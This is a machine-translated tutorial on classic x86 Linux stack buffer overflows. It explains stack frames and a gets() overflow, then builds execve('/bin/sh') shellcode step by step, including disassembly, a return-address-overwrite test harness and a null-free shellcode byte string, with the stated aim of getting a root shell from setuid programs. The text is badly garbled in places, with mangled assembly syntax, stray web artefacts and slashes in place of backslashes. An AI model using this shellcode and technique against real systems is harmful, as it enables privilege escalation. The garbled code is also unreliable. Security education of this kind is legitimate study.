Although overflow is inevitable in the Process of program development, it poses a huge threat to the system. Due to the particularity of the system, when overflow occurs, attackers can exploit this vulnerability to obtain the system's advanced permissions root. Therefore, this article will introduce the stack overflow technology in detail ......
Before you begin to understand stack overflow, you should first understand the win32 assembly language and the register composition and functions. You must have basic knowledge about stack and storage allocation. There are many computer books related to this. I will simply elaborate on the principles and focus on applications. Next, you should understand linux. In this lecture, our example will be developed on linux.
Related Recommendations]:
Stack Overflow technology from entry to entry: Using stack overflow to obtain shell
Stack Overflow technology from entry to advanced: Stack Overflow in windows
1. First, review the basic knowledge.
Physically, a stack is a memory space allocated continuously. Various variables are declared in a program. Static global variables are located in the Data Segment and loaded when the program starts running. Dynamic local variables of the program are allocated to the stack.
In terms of operation, the stack is a queue that comes first and then goes out. The growth direction is the opposite to that of memory. We specify that the memory growth direction is up, and the stack growth direction is down. Stack Operation push = ESP-4, the operation is pop = ESP + 4. In other words, the stack in the old value, its memory address, but greater than the new value. Keep this in mind, because this is the basic theoretical basis for Stack Overflow.
In the callback function call, the stack will be pushed in sequence: parameters, return address, and EBP. If a function has a local variable, the corresponding space is opened in the stack to construct the variable. When the function execution ends, the content of these local variables will be lost. But not cleared. When the function returns, the EBP is displayed, the stack is restored to the function call address, and the return address to the EIP is displayed to continue executing the program.
In C language programs, the parameter pressure stack order is reversed. For example, func (a, B, c ). When the parameter is added to the stack, It is c, B, and. When taking the parameters, because the stack first goes in and then out, take a at the top of the stack, then B, and finally take c. These are the basic knowledge of assembly language. You must understand these knowledge before you begin.
2. Now let's see what Stack Overflow is.
Stack allocation during runtime
Stack Overflow means that too much data is written to the data block regardless of the size of the data block in the stack, leading to data out of bounds, and the result overwrites the old stack data.
For example, program 1:
# Include
Int main ()
{
Char name [8];
Printf ("Please type your name :");
Gets (name );
Printf ("Hello, % s! ", Name );
Return 0;
}
Compile and execute. Input ipxodi to output Hello and ipxodi !. How is the stack operated when the program is running?
When the main function starts to run, the stack will be placed in the return address and EBP in sequence.
We use gcc-S to obtain the Assembly Language Output. We can see that the beginning of the main function corresponds to the following statement:
Pushl % ebp
Movl % esp, % ebp
Subl $8, % esp
First, he saves the EBP, and then EBP is equal to the current ESP, so that EBP can be used to access the local variables of this function. After that, ESP minus 8, that is, the stack increases by 8 bytes to store the name [] array. Finally, main returns. The address in ret is displayed and assigned to the EIP. The CPU continues to execute the command pointed to by the EIP.
Stack Overflow
Now let's run it again. Input ipxodiAAAAAAAAAAAAAAA. After gets (name) is executed, the name array cannot accommodate because the input name string is too long, you have to write 'A' to the top of the memory '. Because the stack growth direction is opposite to the memory growth direction, these 'A' overwrites the old elements of the stack. We can find that EBP and ret have been overwritten by 'A. When main returns, the 'aaa' ASCII code: 0x4141414141 is used as the return address. The CPU tries to execute the command at 0x41414141 and the result is incorrect. This is a stack overflow.
3. How to Use Stack Overflow
We have created a stack overflow. The principle can be summarized as follows: Because the string processing functions (gets, strcpy, and so on) do not monitor and limit the array out-of-bounds, we use the character array to write out-of-bounds and overwrite the value of the old element in the stack, you can modify the return address.
In the preceding example, this causes the CPU to access a non-existent command and the result is incorrect. In fact, when the stack overflows, we have completely controlled the next action of this program. If we overwrite the returned address with an actual instruction address, the CPU will execute our instruction instead.
In the UINX/linux system, our command can execute a shell, which will obtain the same permissions as the program that is overflows by our stack. If this program is set UID, we can get the root shell. The next section describes how to write a shell code.
How to Write a shell code
I. shellcode basic algorithm analysis
In the program, a shell program is written as follows:
Shellcode. c
------------------------------------------------------------------------
# Include
Void main (){
Char * name [2];
Name [0] = "/bin/sh"
Name [1] = NULL;
Execve (name [0], name, NULL );
}
------------------------------------------------------------------------
The execve function will execute a program. He needs the program name address as the first parameter. A pointer array with content of argv [I] (argv [n-1] = 0) of the program serves as the second parameter, and (char *) 0 serves as the third parameter.
Let's take a look at execve's assembly code:
[Nkl10] $ Content $ nbsp; gcc-o shellcode-static shellcode. c
[Nkl10] $ Content $ nbsp; gdb shellcode
(Gdb) disassemble _ execve
Dump of worker er code for function _ execve:
0x80002bc <__execve>: pushl % ebp;
0x80002bd <__execve + 1>: movl % esp, % ebp; above is the function header.
0x80002bf <__ execve + 3>: pushl % ebx; save ebx
0x80002c0 <__ execve + 4>: movl $ 0xb, % eax; eax = 0xb, eax indicates the number of system calls.
0x80002c5 <__execve + 9>: movl 0x8 (% ebp), % ebx; ebp + 8 is the first parameter "/bin/sh \ 0"
0x80002c8 <__execve + 12>: movl 0xc (% ebp), % ecx; ebp + 12 is the address of the second parameter name array.
0x80002cb <__execve + 15>: movl 0x10 (% ebp), % edx; ebp + 16 is the address of the third parameter NULL pointer .; The name [2-1] content is NULL, which is used to store the return value.
0x80002ce <__execve + 18>: int $0x80; Execute system call 0 x B (execve)
0x80002d0 <__ execve + 20>: movl % eax, % edx; the processing of the returned values is useless.
0x80002d2 <__execve + 22>: testl % edx, % edx
0x80002d4 <__ execve + 24>: jnl 0x80002e6 <__ execve + 42>
0x80002d6 <__ execve + 26>: negl % edx
0x80002d8 <__ execve + 28>: pushl % edx
0x80002d9 <__ execve + 29>: call 0x8001a34
<__Normal_errno_location>
0x80002de <__execve + 34>: popl % edx
0x80002df <__execve + 35>: movl % edx, (% eax)
0x80002e1 <__ execve + 37>: movl $0 xffffffff, % eax
0x80002e6 <__execve + 42>: popl % ebx
0x80002e7 <__execve + 43>: movl % ebp, % esp
0x80002e9 <__ execve + 45>: popl % ebp
0x80002ea <__execve + 46>: ret
0x80002eb <__execve + 47>: nop
End of worker er dump.
After the above analysis, we can get the following simplified command algorithm:
Movl $ execve system call number, % eax
Movl "bin/sh \ 0" Address, % ebx
Address of the movl name array, % ecx
Movl name [n-1] address, % edx
Int $0x80; execve)
After execve is successfully executed, the program shellcode will exit and/bin/sh will continue to be executed as a sub-process. However, if execve fails to be executed (for example, there is no/bin/sh file), the CPU will continue to execute subsequent commands and the results will not know where to go. Therefore, an exit () system call must be executed to end the execution of shellcode. c.
Let's take a look at the compilation code of exit (0:
(Gdb) disassemble _ exit
Dump of worker er code for function _ exit:
0x800034c <_ exit>: pushl % ebp
0x800034d <_ exit + 1>: movl % esp, % ebp
0x800034f <_ exit + 3>: pushl % ebx
0x8000350 <_ exit + 4>: movl $0x1, % eax; 1 system call
0x8000355 <_ exit + 9>: movl 0x8 (% ebp), % ebx; ebx is the parameter 0
0x8000358 <_ exit + 12>: int $0x80; triggers a system call.
0x800035a <_ exit + 14>: movl 0 xfffffffc (% ebp), % ebx
0x800035d <_ exit + 17>: movl % ebp, % esp
0x800035f <_ exit + 19>: popl % ebp
0x8000360 <_ exit + 20>: ret
0x8000361 <_ exit + 21>: nop
0x8000362 <_ exit + 22>: nop
0x8000363 <_ exit + 23>: nop
End of worker er dump.
It seems that the compilation code of exit (0) is simpler:
Movl $0x1, % eax; 1 system call
Movl 0, % ebx; ebx is the exit parameter 0
Int $0x80; triggers system call
To sum up, the merged assembly code is:
Movl $ execve system call number, % eax
Movl "bin/sh \ 0" Address, % ebx
Address of the movl name array, % ecx
Movl name [n-1] address, % edx
Int $0x80; execve)
Movl $0x1, % eax; 1 system call
Movl 0, % ebx; ebx is the exit parameter 0
Int $0x80; Execute system call (exit)
2. Implement a shellcode
Okay. Let's implement this algorithm. First, we must have a string "/bin/sh" and a name array. We can construct them, but how do we know their addresses in shellcode? Every time a program is dynamically loaded, the address of the string and name array is not fixed. Through the combination of JMP and call, hackers cleverly solved this problem.
------------------------------------------------------------------------
The offset address of jmp call #2 bytes popl % esi #1 byte // popl is the string address.
Movl % esi, array-offset (% esi) #3 bytes // construct the name array at string + 8, // name [0] Put the string address
Movb $0x0, nullbyteoffset (% esi) #4 bytes // place 0 in string + 7 as the end of string.
Movl $0x0, null-offset (% esi) #7 bytes // name [1] Put 0.
Movl $ 0xb, % eax #5 bytes // eax = 0xb is the execve syscall code.
Movl % esi, % ebx #2 bytes // address of ebx = string
Leal array-offset, (% esi), % ecx #3 bytes // ecx = start address of the name array
Leal null-offset (% esi), % edx #3 bytes // edx = name [1] address
Int $0x80 #2 bytes // int 0x80 is sys call
Movl $0x1, % eax #5 bytes // eax = 0x1 is the exit syscall code
Movl $0x0, % ebx #5 bytes // ebx = 0 is the return value of exit
Int $0x80 #2 bytes // int 0x80 is sys call
Call popl offset address #5 bytes // put the call here, the string address will be used as the return address to press the stack.
/Bin/sh string
------------------------------------------------------------------------
First, use the relative address of JMP to jump to the call. After the call command is executed, the address of the string/bin/sh will be pushed into the stack as the return address of the call. Now, go to popl esi and obtain the real address of the string from the string address just pushed into the stack. Then, 0 is assigned to the first byte of the string as the end of the string. The next 8 bytes. Construct two integers (eight bytes) in the name array ).
We can write shellcode. Write the Assembly source program first.
Shellcodeasm. c
------------------------------------------------------------------------
Void main (){
_ Asm __("
Jmp 0x2a #3 bytes
Popl % esi #1 byte
Movl % esi, 0x8 (% esi) #3 bytes
Movb $0x0 0x7 (% esi) #4 bytes
Movl $0x0, 0xc (% esi) #7 bytes
Movl $ 0xb, % eax #5 bytes
Movl % esi, % ebx #2 bytes
Leal 0x8 (% esi), % ecx #3 bytes
Leal 0xc (% esi), % edx #3 bytes
Int $0x80 #2 bytes
Movl $0x1, % eax #5 bytes
Movl $0x0, % ebx #5 bytes
Int $0x80 #2 bytes
Call-0x2f #5 bytes
. String/"/bin/sh/" #8 bytes
");
}
After compilation, use the gdb B/bx [address] command to obtain the hexadecimal representation.
Below, write the test program as follows: note that this test program is the basic program for testing shellcode)
Test. c
Char shellcode [] = "/xeb/x2a/x5e/x89/x76/x08/xc6/x46/x07/x00/xc7/x46/x0c/x00/x00/x00"
"/X00/xb8/x0b/x00/x00/x00/x89/xf3/x8d/x4e/x08/x8d/x56/x0c/xcd/x80"
"/Xb8/x01/x00/x00/x00/xbb/x00/x00/x00/x00/xcd/x80/xe8/xd1/xff"
"/Xff/x2f/x62/x69/x6e/x2f/x73/x68/x00/x89/xec/x5d/xc3"
Void main (){
Int * ret;
Ret = (int *) & ret + 2; // ret is equal to main) return address // (+ 2 is because pushl ebp exists; otherwise, you can add 1 .)
(* Ret) = (int) shellcode; // modify main). The return address is the starting address of shellcode.
}
[Nkl10] $ Content $ nbsp; gcc-o test. c
[Nkl10] $ Content $ nbsp;./test
$ Content $ nbsp; exit
[Nkl10] $ Content $ nbsp;
We store the shellcode through a shellcode array. c) when the returned address ret is set to the starting address of the shellcode array, the program will execute our hellcode when returning, thus we get a shell. Run the result and get the bsh prompt $, indicating that a shell is successfully opened. It is necessary to explain that we put shellcode as a global variable in the data segment rather than as a piece of code. In the operating system, the content of a program code segment has read-only attributes. It cannot be modified. In our code, movl % esi, 0x8 (% esi) and other statements modify part of the code, so they cannot be placed in the code segment. Is This shellcode okay? Unfortunately, it is a little worse. In retrospect, the key to stack overflow lies in the overwrite of the string array. However, when processing strings, string functions such as gets and strcpy end with "/0. When/0, the write operation is completed. Our shellcode string contains a large number of/0 characters. Therefore, for getsname), The shellcode above is not feasible. Our shellcode cannot contain/0 characters.
Therefore, some commands need to be modified:
Old commands new commands
Movb $0x0 0x7 (% esi) xorl % eax, % eax
Molv $0x0, 0xc (% esi) movb % eax, 0x7 (% esi)
Movl % eax, 0xc (% esi)
--------------------------------------------------------
Movl $ 0xb, % eax movb $ 0xb, % al
--------------------------------------------------------
Movl $0x1, % eax xorl % ebx, % ebx
Movl $0x0, % ebx movl % ebx, % eax
Inc % eax
--------------------------------------------------------
The final shellcode is:
------------------------------------------------------------------------
Char shellcode [] =
00 "/xeb/x1f"/* jmp 0x1f */
02 "/x5e"/* popl % esi */
03 "/x89/x76/x08"/* movl % esi, 0x8 (% esi )*/
06 "/x31/xc0"/* xorl % eax, % eax */
08 "/x88/x46/x07"/* movb % eax, 0x7 (% esi )*/
0b "/x89/x46/x0c"/* movl % eax, 0xc (% esi )*/
0e "/xb0/x0b"/* movb $ 0xb, % al */
10 "/x89/xf3"/* movl % esi, % ebx */
12 "/x8d/x4e/x08"/* leal 0x8 (% esi), % ecx */
15 "/x8d/x56/x0c"/* leal 0xc (% esi), % edx */
18 "/xcd/x80"/* int $0x80 */
1a "/x31/xdb"/* xorl % ebx, % ebx */
1c "/x89/xd8"/* movl % ebx, % eax */
1e "/x40"/* inc % eax */
1f "/xcd/x80"/* int $0x80 */
21 "/xe8/xdc/xff"/* call-0x24 */
26 "/bin/sh"/*. string/"/bin/sh /"*/